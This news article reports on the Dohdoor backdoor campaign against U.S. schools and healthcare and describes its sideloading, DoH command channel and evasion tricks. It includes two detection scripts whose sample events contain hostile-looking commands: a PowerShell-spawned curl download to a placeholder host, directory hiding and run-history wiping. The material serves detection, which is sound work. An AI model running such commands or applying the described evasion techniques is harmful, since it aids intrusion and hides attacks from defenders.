CyberSecurity SEE

Dohdoor Malware Targets U.S. Schools and Healthcare Through Multi-Stage Attack


New Malware Threat: Dohdoor Targets U.S. Schools and Healthcare Sectors

In a concerning development, a newly identified backdoor known as Dohdoor is reportedly targeting educational institutions and healthcare organizations across the United States through a sophisticated, multi-stage attack chain. This campaign, identified as UAT-10027, has been particularly alarming given that these sectors typically handle highly sensitive personal and medical information but frequently find themselves constrained by limited security budgets and outdated systems.

Cisco Talos, the cybersecurity division of Cisco, has noted that UAT-10027 may have ties to North Korean cyber actors. This assertion comes from the distinct similarities in tools and techniques employed by the attackers, which align with those previously observed in operations attributed to the Lazarus Group, a well-known cybercrime organization linked to North Korea. These overlaps include the use of custom decryption logic, DLL sideloading, process hollowing, and abuse of DNS-over-HTTPS (DoH) for command-and-control (C2) communications.

Overview of the Attack Chain

The ultimate objective of the attackers appears to be establishing persistent backdoor access through Dohdoor and deploying follow-on payloads. These secondary payloads are likely to include Cobalt Strike beacons aimed at compromising networks more deeply and facilitating lateral movement within victim organizations.

The UAT-10027 campaign has reportedly been in motion since at least December 2025. The attackers utilize DNS-over-HTTPS and reputable cloud infrastructure to conceal their C2 traffic, which complicates efforts to detect their malicious activities. However, the profile of targeted entities does not wholly fit the typical pattern of Lazarus Group operations that generally focus on cryptocurrency theft or defense mechanisms. Despite this, the aforementioned tools and tactics indicate a strong likelihood of North Korean involvement.

Initial Access and Exploitation Techniques

Initial access to targeted systems is believed to be gained through social engineering, primarily phishing emails that trigger PowerShell scripts. These scripts act as downloaders, executing a series of commands to retrieve a malicious batch script from a remote server. Telemetry data and Open Source Intelligence (OSINT) indicate that the attacker uses PowerShell to invoke curl.exe, passing an encoded URL that points to the batch script.

In the subsequent phase, the malware runs a Windows batch script, which creates a hidden working directory under C:\ProgramData or C:\Users\Public. The script then downloads a malicious Dynamic Link Library (DLL) and renames it to mimic a legitimate system file such as propsys.dll or batmeter.dll. Trusted Windows binaries such as Fondue.exe, mblctr.exe, or ScreenClippingHost.exe are then used to sideload the malicious DLL. This phase concludes with the script cleaning up after itself, including wiping the Run history and deleting itself from the system.
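The delivery chain above (PowerShell spawning curl.exe, a hidden staging directory under C:\ProgramData or C:\Users\Public, a trusted binary run from that directory to sideload a DLL renamed to propsys.dll or batmeter.dll, and Run-history cleanup) leaves several process-level signals that can be checked from endpoint telemetry. The script below is an added example written for this article and is not code from Cisco Talos or the malware; the pipe-delimited process-creation and image-load events are constructed to resemble the chain, the "hxxp" URL and example.invalid host are placeholders, and the RunMRU registry key is assumed to be what "wiping the Run history" refers to.

```python
"""Detection logic for the UAT-10027 delivery chain (added example, not Talos code).
Event lines are a constructed 'key=value|key=value' format, not real telemetry."""
from typing import Dict, List, Tuple

# Trusted sideload hosts named in the article
SIDELOAD_HOSTS = {"fondue.exe", "mblctr.exe", "screenclippinghost.exe"}
# System DLL names the malicious DLL is renamed to
SPOOFED_DLLS = {"propsys.dll", "batmeter.dll"}
# Staging directories named in the article
STAGING_DIRS = ("c:\\programdata\\", "c:\\users\\public\\")
# Where the genuine copies of the host binaries and DLLs live
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed sample events: the first five mimic the chain, the last two are benign look-alikes
SAMPLE_EVENTS = [
    "type=proc|parent=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|image=C:\\Windows\\System32\\curl.exe"
    "|cmdline=curl.exe -s -o C:\\Users\\Public\\u.bat hxxp://example.invalid/%72%75%6e",
    "type=proc|parent=C:\\Windows\\System32\\cmd.exe|image=C:\\Windows\\System32\\attrib.exe"
    "|cmdline=attrib +h +s C:\\ProgramData\\.cache",
    "type=proc|parent=C:\\Windows\\System32\\cmd.exe|image=C:\\ProgramData\\.cache\\mblctr.exe"
    "|cmdline=mblctr.exe",
    "type=load|image=C:\\ProgramData\\.cache\\mblctr.exe|loaded=C:\\ProgramData\\.cache\\propsys.dll",
    "type=proc|parent=C:\\Windows\\System32\\cmd.exe|image=C:\\Windows\\System32\\reg.exe"
    "|cmdline=reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f",
    # benign: the real mblctr.exe launched from System32
    "type=proc|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\mblctr.exe|cmdline=mblctr.exe",
    # benign: the real propsys.dll loaded from System32
    "type=load|image=C:\\Windows\\explorer.exe|loaded=C:\\Windows\\System32\\propsys.dll",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed event line into a field dictionary."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def in_dirs(path: str, dirs: Tuple[str, ...]) -> bool:
    return path.lower().startswith(dirs)


def classify_process_event(ev: Dict[str, str]) -> List[str]:
    """Return the names of every chain stage this single event matches."""
    findings: List[str] = []
    image = ev.get("image", "")
    cmd = ev.get("cmdline", "").lower()
    if ev.get("type") == "proc":
        parent = basename(ev.get("parent", ""))
        # Stage 1: PowerShell spawning curl.exe, optionally writing into a staging directory
        if basename(image) == "curl.exe" and parent == "powershell.exe":
            findings.append("powershell_spawns_curl")
            if any(d in cmd for d in STAGING_DIRS):
                findings.append("curl_writes_to_staging_dir")
        # Stage 2: a directory under the staging paths being marked hidden
        if basename(image) == "attrib.exe" and "+h" in cmd and any(d in cmd for d in STAGING_DIRS):
            findings.append("hidden_staging_dir")
        # Stage 3: a known sideload host executed from outside the Windows system directories
        if basename(image) in SIDELOAD_HOSTS and not in_dirs(image, SYSTEM_DIRS):
            findings.append("sideload_host_outside_system32")
        # Stage 4: Run-dialog history cleared via reg.exe (RunMRU key assumed)
        if basename(image) == "reg.exe" and "delete" in cmd and "runmru" in cmd:
            findings.append("runmru_cleared")
    elif ev.get("type") == "load":
        loaded = ev.get("loaded", "")
        # A spoofed system DLL name loaded from a staging directory rather than System32
        if basename(loaded) in SPOOFED_DLLS and in_dirs(loaded, STAGING_DIRS):
            findings.append("spoofed_dll_from_staging_dir")
    return findings


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Run the classifier over a batch of lines; returns (line index, finding) pairs."""
    return [(i, f) for i, line in enumerate(lines) for f in classify_process_event(parse_event(line))]


if __name__ == "__main__":
    for idx, finding in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {finding}")
```

Each stage is scored on its own so that a single hit (a browser downloading with curl, say) stays low-confidence, while several stages from the same host within a short window are what an analyst would escalate; correlating by host and time is left to the SIEM.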

Payload Delivery and Evasion Methods

Upon loading Dohdoor, the malware creates a backdoor and pulls in the next-stage payload, most likely a Cobalt Strike Beacon that operates within legitimate Windows processes to avoid detection. Notably, the malware employs process hollowing techniques, executing decrypted payloads through trusted binaries, further ensuring stealth.

A unique characteristic of Dohdoor is its utilization of DNS-over-HTTPS, which allows it to blend its malicious traffic with regular web activity. Unlike traditional malware that sends plaintext DNS queries, Dohdoor creates encrypted HTTPS requests directed at Cloudflare’s DoH service. It cleverly masquerades these requests with headers that resemble legitimate applications, thus further masking its activity from traditional defense mechanisms.

Additionally, the malware obfuscates its network activity using deceptive subdomains that mimic software updates or security systems. This makes it challenging for security solutions to simply block based on string patterns, thus elevating the level of difficulty in mitigating the threat.
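Because the C2 channel described above rides on Cloudflare's DoH service with browser-like headers, blocking on string patterns is not enough; a more useful check is which process is speaking DoH and what names it asks for. The script below is an added example, not the article's or Talos's code: it parses RFC 8484 GET requests (the base64url "dns" parameter) and Cloudflare's JSON variant (the "name" parameter) out of constructed egress-proxy records, flags DoH from processes that are not browsers, and applies a crude heuristic for the decoy "update" and "security" subdomains the article mentions. The browser allow-list, the decoy keyword list and the random-label rule are assumptions chosen for the example, and example.invalid stands in for the attacker's domain.

```python
"""DoH abuse detection over constructed egress records (added example, not Talos code)."""
import base64
import struct
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

DOH_HOSTS = {"cloudflare-dns.com", "1.1.1.1", "1.0.0.1"}   # Cloudflare public DoH endpoints
DOH_MEDIA = {"application/dns-message", "application/dns-json"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}     # assumed allow-list of DoH-capable processes
DECOY_WORDS = ("update", "patch", "security", "antivirus", "defender")  # assumed decoy vocabulary


def encode_query(name: str, qid: int = 0x1234) -> bytes:
    """Build a minimal DNS A query in wire format (only used to construct sample records)."""
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack(">HH", 1, 1)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def qname_from_wire(msg: bytes) -> Optional[str]:
    """Read the first question name from a DNS wire message; None if malformed."""
    labels, pos = [], 12                      # 12-byte header precedes the question section
    while pos < len(msg):
        n = msg[pos]
        if n == 0:
            return ".".join(labels) if labels else None
        if n & 0xC0 or pos + 1 + n > len(msg):  # compression pointers are not expected in a query name
            return None
        labels.append(msg[pos + 1:pos + 1 + n].decode("ascii", "replace"))
        pos += 1 + n
    return None


def query_name(path: str) -> Optional[str]:
    """Extract the queried name from an RFC 8484 GET (?dns=) or a JSON-API GET (?name=)."""
    qs = parse_qs(urlsplit(path).query)
    if "name" in qs:
        return qs["name"][0].rstrip(".")
    if "dns" in qs:
        return qname_from_wire(b64url_decode(qs["dns"][0]))
    return None


def looks_random(label: str) -> bool:
    """Crude heuristic: a long label mixing letters with several digits."""
    return len(label) >= 8 and sum(c.isdigit() for c in label) >= 3 and any(c.isalpha() for c in label)


def classify_http_event(ev: Dict[str, str]) -> List[str]:
    findings: List[str] = []
    is_doh = ev["host"].lower() in DOH_HOSTS and ev["path"].startswith("/dns-query")
    is_doh = is_doh or ev.get("accept", "").lower() in DOH_MEDIA
    if not is_doh:
        return findings
    if ev["proc"].lower() not in BROWSERS:
        findings.append("doh_from_non_browser_process")
    name = query_name(ev["path"])
    if name:
        lowered = name.lower()
        # Decoy pattern: update/security vocabulary combined with a random-looking label
        if any(w in lowered for w in DECOY_WORDS) and any(looks_random(l) for l in lowered.split(".")):
            findings.append("decoy_update_domain:" + name)
    return findings


# Constructed sample records (process, host, path, Accept header); not real traffic
SAMPLE_EVENTS = [
    {"proc": "chrome.exe", "host": "cloudflare-dns.com",
     "path": "/dns-query?dns=" + b64url_encode(encode_query("www.example.invalid")),
     "accept": "application/dns-message"},
    {"proc": "mblctr.exe", "host": "cloudflare-dns.com",
     "path": "/dns-query?dns=" + b64url_encode(encode_query("x7q2mf9k.update-check.example.invalid")),
     "accept": "application/dns-message"},
    {"proc": "mblctr.exe", "host": "1.1.1.1",
     "path": "/dns-query?name=av3k9z1q.security-telemetry.example.invalid&type=TXT",
     "accept": "application/dns-json"},
    {"proc": "mblctr.exe", "host": "www.example.invalid", "path": "/index.html", "accept": "text/html"},
]

if __name__ == "__main__":
    for idx, ev in enumerate(SAMPLE_EVENTS):
        print(idx, ev["proc"], classify_http_event(ev))
```

POST-style DoH carries the query in the request body rather than the URL, so the same `qname_from_wire` parser should be applied to the body where the proxy logs it; the process-based rule still fires without a name. The random-label heuristic is deliberately simple and will need tuning against local traffic before it is used for alerting.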

Anti-Detection Measures and Final Payload

Dohdoor incorporates advanced techniques to evade detection, including dynamically resolving Windows API functions by hash instead of relying on static imports. It also unhooks syscalls in ntdll.dll to bypass monitoring hooks placed on sensitive functions. The malware’s final payload is said to be protected by a custom XOR-SUB decryption scheme that uses a complicated size ratio and position-dependent logic, further obscuring its activities.

Cisco Talos has identified TLS fingerprints that exhibit similarities to those typically associated with Cobalt Strike servers, supporting the assertion that Dohdoor serves as a loader for such payloads. In response to this emerging threat, Cisco has implemented additional security features within its security stack, including ClamAV signatures and Snort rules, aimed at detecting both the loading components and the associated network activities.

Conclusion

As cyberattacks targeting educational and healthcare sectors continue to evolve in sophistication, the emergence of malware like Dohdoor exemplifies the urgent need for enhanced security protocols. With a multi-faceted approach, combining technology and human vigilance, organizations must strive to fortify their defenses against such threats. This evolving landscape underscores the critical importance of cybersecurity in protecting sensitive data and maintaining trust within these essential sectors.
